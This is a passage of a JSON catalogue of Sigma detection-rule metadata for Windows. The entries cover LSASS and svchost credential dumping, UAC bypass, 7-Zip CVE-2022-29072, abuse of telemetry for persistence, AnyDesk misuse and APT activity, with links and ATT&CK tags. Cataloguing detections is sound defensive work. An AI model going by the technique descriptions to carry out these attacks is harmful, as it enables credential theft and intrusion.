- "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
- "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2021/11/27",
- "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate software accessing LSASS process for legitimate reason"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials",
- "uuid": "174afcfa-6e40-4ae9-af64-496546389294",
- "value": "SVCHOST Credential Dump",
- "meta": {
- "refs": [
-
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml"
- ],
- "tags": [
- "attack.t1548"
- ],
- "creation_date": "2021/04/30",
- "filename": "proc_access_win_svchost_cred_dump.yml",
- "author": "Florent Labouyrie",
- "level": "high",
- "falsepositive": [
- "Non identified legit exectubale"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)",
- "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c",
- "value": "UAC Bypass Using WOW64 Logger DLL Hijack",
- "meta": {
- "refs": [
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2021/08/23",
- "filename": "proc_access_win_uac_bypass_wow64_logger.yml",
- "author": "Christian Burkard",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. 
The command runs in a child process under the 7zFM.exe process.",
- "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3",
- "value": "Suspicious 7zip Subprocess",
- "meta": {
- "refs": [
- "https://github.com/kagancapar/CVE-2022-29072",
- "https://twitter.com/kagancapar/status/1515219358234161153",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml"
- ],
- "tags": [
- "cve.2022.29072"
- ],
- "creation_date": "2022/04/17",
- "filename": "proc_creation_win_7zip_cve_2022_29072.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detection of unusual child processes by different system processes",
- "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae",
- "value": "Abused Debug Privilege by Arbitrary Parent Processes",
- "meta": {
- "refs": [
- "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548"
- ],
- "creation_date": "2020/10/28",
- "filename": "proc_creation_win_abusing_debug_privilege.yml",
- "author": "Semanur Guneysu @semanurtg, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. 
The problem is, it will run any arbitrary command without restriction of location or type.",
- "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549",
- "value": "Abusing Windows Telemetry For Persistence",
- "meta": {
- "refs": [
- "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.t1112",
- "attack.t1053"
- ],
- "creation_date": "2020/09/29",
- "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml",
- "author": "Sreeman",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges",
- "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37",
- "value": "Accesschk Usage To Check Privileges",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43",
- "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
- "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
- "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1069.001"
- ],
- "creation_date": "2020/10/13",
- "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml",
- "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)",
- "level": "medium",
- "falsepositive": [
-
"System administrator Usage"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.",
- "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f",
- "value": "Advanced IP Scanner",
- "meta": {
- "refs": [
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
- "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1046",
- "attack.t1135"
- ],
- "creation_date": "2020/05/12",
- "filename": "proc_creation_win_advanced_ip_scanner.yml",
- "author": "@ROxPinTeddy, Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative use"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of Advanced Port Scanner.",
- "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d",
- "value": "Advanced Port Scanner",
- "meta": {
- "refs": [
- "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1046",
- "attack.t1135"
- ],
- "creation_date": "2021/12/18",
- "filename": "proc_creation_win_advanced_port_scanner.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative use",
- "Tools with similar commandline (very rare)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection",
- "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c",
- "value": "Execute From Alternate Data Streams",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2021/09/01",
- "filename": "proc_creation_win_alternate_data_streams.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"",
- "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa",
- "value": "Always Install Elevated MSI Spawned Cmd And Powershell",
- "meta": {
- "refs": [
- "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2020/10/13",
- "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml",
- "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community",
- "level": "medium",
-
"falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege",
- "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770",
- "value": "Always Install Elevated Windows Installer",
- "meta": {
- "refs": [
- "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2020/10/13",
- "filename": "proc_creation_win_always_install_elevated_windows_installer.yml",
- "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community",
- "level": "medium",
- "falsepositive": [
- "System administrator usage",
- "Anti virus products"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
- "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94",
- "value": "Use of Anydesk Remote Access Software",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/02/11",
- "filename": "proc_creation_win_anydesk.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag",
- "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c",
- "value": "AnyDesk Inline Piped Password",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/09/28",
- "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Legitimate piping of the password to anydesk",
- "Some FP could occure with similar tools that uses the same command line '--set-password'"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.",
- "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9",
- "value": "AnyDesk Silent Installation",
- "meta": {
- "refs": [
- "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20",
- "https://support.anydesk.com/Automatic_Deployment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2021/08/06",
- "filename": "proc_creation_win_anydesk_silent_install.yml",
- "author": "J\u00e1n Tren\u010dansk\u00fd",
- "level": "high",
- "falsepositive": [
- "Legitimate deployment of AnyDesk"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
- "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86",
- "value": "Use of Anydesk Remote Access Software from Suspicious Folder",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/05/20",
- "filename": "proc_creation_win_anydesk_susp_folder.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate use of AnyDesk from a non-standard folder"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.",
- "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602",
- "value": "Scheduled Task WScript VBScript",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053",
- "attack.t1053.005"
- ],
- "creation_date": "2022/02/07",
- "filename": "proc_creation_win_apt_actinium_persistence.yml",
- "author": "Andreas Hunkeler (@Karneades)",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. 
think tanks.", - "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", - "value": "APT29", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" - ], - "tags": [ - "attack.execution", - "attack.g0016", - "attack.t1059.001" - ], - "creation_date": "2018/12/04", - "filename": "proc_creation_win_apt_apt29_thinktanks.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity that could be related to Baby Shark malware", - "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "value": "Baby Shark Activity", - "meta": { - "refs": [ - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.001", - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1218.005" - ], - "creation_date": "2019/02/24", - "filename": "proc_creation_win_apt_babyshark.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "value": "Judgement Panda Credential Access Activity", - "meta": { - "refs": [ - 
"https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" - ], - "creation_date": "2019/02/21", - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", - "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "value": "BlueMashroom DLL Load", - "meta": { - "refs": [ - "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/10/02", - "filename": "proc_creation_win_apt_bluemashroom.yml", - "author": "Florian Roth, Tim Shelton", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "value": "Chafer Activity", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - 
"attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "proc_creation_win_apt_chafer_mar18.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmiexec vbs version execution by wscript or cscript", - "uuid": "966e4016-627f-44f7-8341-f394905c361f", - "value": "WMIExec VBS Script", - "meta": { - "refs": [ - "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" - ], - "creation_date": "2017/04/07", - "filename": "proc_creation_win_apt_cloudhopper.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects CrackMapExecWin Activity as Described by NCSC", - "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", - "value": "CrackMapExecWin", - "meta": { - "refs": [ - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", - "https://attack.mitre.org/software/S0488/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" - ], - "tags": [ - "attack.g0035", - "attack.credential_access", - "attack.discovery", - "attack.t1110", - "attack.t1087" - ], - "creation_date": "2018/04/08", - "filename": "proc_creation_win_apt_dragonfly.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": 
"windows" - } - }, - { - "description": "Detects Elise backdoor acitivty as used by APT32", - "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", - "value": "Elise Backdoor", - "meta": { - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" - ], - "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2018/01/31", - "filename": "proc_creation_win_apt_elise.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "value": "Emissary Panda Malware SLLauncher", - "meta": { - "refs": [ - "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", - "https://twitter.com/cyb3rops/status/1168863899531132929", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2018/09/03", - "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects EmpireMonkey APT reported Activity", - "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", - "value": "Empire Monkey", - "meta": { - "refs": [ - "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" - ], 
- "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/04/02", - "filename": "proc_creation_win_apt_empiremonkey.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Very Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a specific tool and export used by EquationGroup", - "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "value": "Equation Group DLL_U Load", - "meta": { - "refs": [ - "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", - "https://securelist.com/apt-slingshot/84312/", - "https://twitter.com/cyb3rops/status/972186477512839170", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" - ], - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2019/03/04", - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", - "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "value": "EvilNum Golden Chickens Deployment via OCX Files", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/07/10", - "filename": "proc_creation_win_apt_evilnum_jul20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - 
], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "uuid": "18739897-21b1-41da-8ee4-5b786915a676", - "value": "GALLIUM Artefacts", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212", - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2020/02/07", - "filename": "proc_creation_win_apt_gallium.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", - "value": "GALLIUM Sha1 Artefacts", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212", - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2020/02/07", - "filename": "proc_creation_win_apt_gallium_sha1.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", - "value": "Suspicious UltraVNC Execution", - "meta": { - "refs": [ - "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" - ], - "creation_date": "2022/03/04", - "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", - "uuid": "3711eee4-a808-4849-8a14-faf733da3612", - "value": "Greenbug Campaign Indicators", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" - ], - "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2020/05/20", - "filename": "proc_creation_win_apt_greenbug_may20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity observed by different 
researchers to be HAFNIUM group activity (or related) on Exchange servers", - "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "value": "Exchange Exploitation Activity", - "meta": { - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", - "https://twitter.com/BleepinComputer/status/1372218235949617161", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" - ], - "creation_date": "2021/03/09", - "filename": "proc_creation_win_apt_hafnium.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Hurricane Panda Activity", - "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", - "value": "Hurricane Panda Activity", - "meta": { - "refs": [ - 